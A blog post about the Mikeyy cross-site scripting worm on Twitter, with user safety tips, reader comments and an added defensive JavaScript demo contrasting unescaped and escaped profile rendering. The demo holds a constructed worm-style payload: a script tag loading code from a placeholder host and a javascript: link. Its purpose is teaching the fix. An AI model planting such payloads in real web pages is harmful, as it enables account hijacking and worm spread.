Twitter Web Worm Causes Havoc

Update: Apparently a number of variant worms are doing the rounds that circumvent Twitter’s recent patch for the problem. I’d be cautious using Twitter over the next couple of weeks; see the protection guidelines below.

Teen exploits Twitter

A 17-year-old has claimed credit for releasing a cross-site scripting (XSS) worm that infected hundreds of accounts over the long weekend:

Brooklyn resident Michael “Mikeyy” Mooney, 17, told CNET News in an interview that he created the worm “out of boredom.”

“I thought about it later and basically did it because I was bored,” he said. “And I didn’t think Twitter would fix (the flaw) very soon. But I didn’t think it would spread as far or as fast as it did.”

Well, it looks like we can add this to our recent Twitter vulnerability history post.

It looks like Twitter is going to try to press charges against the teen. This sounds very similar to the Samy worm that hit MySpace.

Although the worm itself did nothing beyond spreading itself (it was merely a proof of concept), the same hole could easily have been used to compromise every infected account. Nasty indeed!

I think the danger of cross-site scripting vulnerabilities lies in how little skill is required to discover and exploit them: any field that echoes user input back into a page without escaping it is enough. This vulnerability type is a prime vector for future web 2.0 worms, which threaten sites like Twitter, MySpace, Facebook, LinkedIn and others.
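To make the mechanism concrete, here is an added example (it is not code from the post, from Twitter, or from the worm) of the stored-XSS pattern an XSS worm relies on: a profile renderer that concatenates user-controlled fields straight into HTML, next to a hardened version that escapes every field for the context it lands in and restricts link targets to http(s). The profile fields, the payload and the script URL are constructed placeholders, not the real worm's.

```javascript
// Added example, not from the original post. Demonstrates why an unescaped
// profile field is enough for a self-propagating XSS payload, and what the fix
// looks like. All names and the sample profile below are constructed.

// Minimal HTML escaper: neutralises the five characters that let user input
// break out of text content or a quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Vulnerable: free-text profile fields are concatenated directly into markup.
// A bio containing a <script> tag becomes executable code for everyone who
// views the profile, which is exactly the foothold a stored-XSS worm needs.
function renderProfileUnsafe(profile) {
  return `<div class="profile"><h2>${profile.name}</h2>` +
         `<p class="bio">${profile.bio}</p>` +
         `<a href="${profile.url}">${profile.url}</a></div>`;
}

// Only http(s) links are allowed through; anything else (javascript:, data:,
// unparseable junk) is replaced with a harmless "#".
function safeHref(url) {
  try {
    const u = new URL(String(url));
    if (u.protocol === "http:" || u.protocol === "https:") return u.href;
  } catch (_) {
    // not a URL at all; fall through to the safe default
  }
  return "#";
}

// Hardened: every user-controlled value is escaped, and the href is both
// scheme-checked and escaped, so neither a <script> tag in the bio nor a
// javascript: URL in the link field can execute.
function renderProfileSafe(profile) {
  return `<div class="profile"><h2>${escapeHtml(profile.name)}</h2>` +
         `<p class="bio">${escapeHtml(profile.bio)}</p>` +
         `<a href="${escapeHtml(safeHref(profile.url))}">${escapeHtml(profile.url)}</a></div>`;
}

// Crude check: does the rendered markup still contain a live script tag or a
// javascript: link target? (Text that merely *mentions* "javascript:" is fine.)
function containsLiveScript(html) {
  return /<script[\s>]/i.test(html) ||
         /href\s*=\s*["']?\s*javascript:/i.test(html);
}

// Constructed sample profile carrying a worm-style payload in the bio and a
// javascript: URL in the link field. The script URL is a placeholder.
const hostileProfile = {
  name: "mikeyy",
  bio: '<script src="https://example.invalid/worm.js"></script>',
  url: "javascript:alert(1)",
};

// Renders the same hostile profile both ways so the difference is visible.
function compareRenderings(profile) {
  const unsafe = renderProfileUnsafe(profile);
  const safe = renderProfileSafe(profile);
  return {
    unsafeExecutes: containsLiveScript(unsafe),  // true: payload is live
    safeExecutes: containsLiveScript(safe),      // false: payload is inert text
    safeHtml: safe,
  };
}

console.log(compareRenderings(hostileProfile));
```

The point of the check is that the payload survives untouched in the unsafe rendering and is reduced to inert text in the safe one; the same escaping has to be applied everywhere user input is echoed, not just on the profile page, or the worm simply moves to the field that was missed.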

Keeping safe from the worm

First of all, experts advise Twitter users not to click on any links in messages containing the words “Mikeyy” or “Stalkdaily.” It is recommended that you use a third-party Twitter desktop client such as Twhirl or TweetDeck (both PC and Mac), since these display tweets as plain text rather than rendering profile pages in a browser, and that you avoid the web-based version of Twitter, especially for viewing user profiles (as this is where the attack seems to originate).

As an additional security measure, you can disable JavaScript in your browser. Firefox users can use the NoScript add-on, which blocks scripts from any site you have not explicitly allowed. Bear in mind that turning off JavaScript also breaks much of the web-based Twitter interface, so this is a trade-off between convenience and safety.


Comments

I would also advise people not to sign up to Twitter’s SMS service. I did at the weekend and what fun it proved… 500 ‘confirmation messages’ interspersed with 500 confirmations of cancel

Oops, ran out of space. I’ll start where I left off: …-lation after texting ‘stop’. PS: I only came here to remove email updates but can’t find a link with my mobile browser. Starting to worry about the state of the web, especially for mobile users.

Had nothing better to do; what a jerk. I’m not a Twitter user; however, I know many people who do use it, so I stumbled the article. Hopefully, people will find this so they can be aware.

Thanks for the heads up.
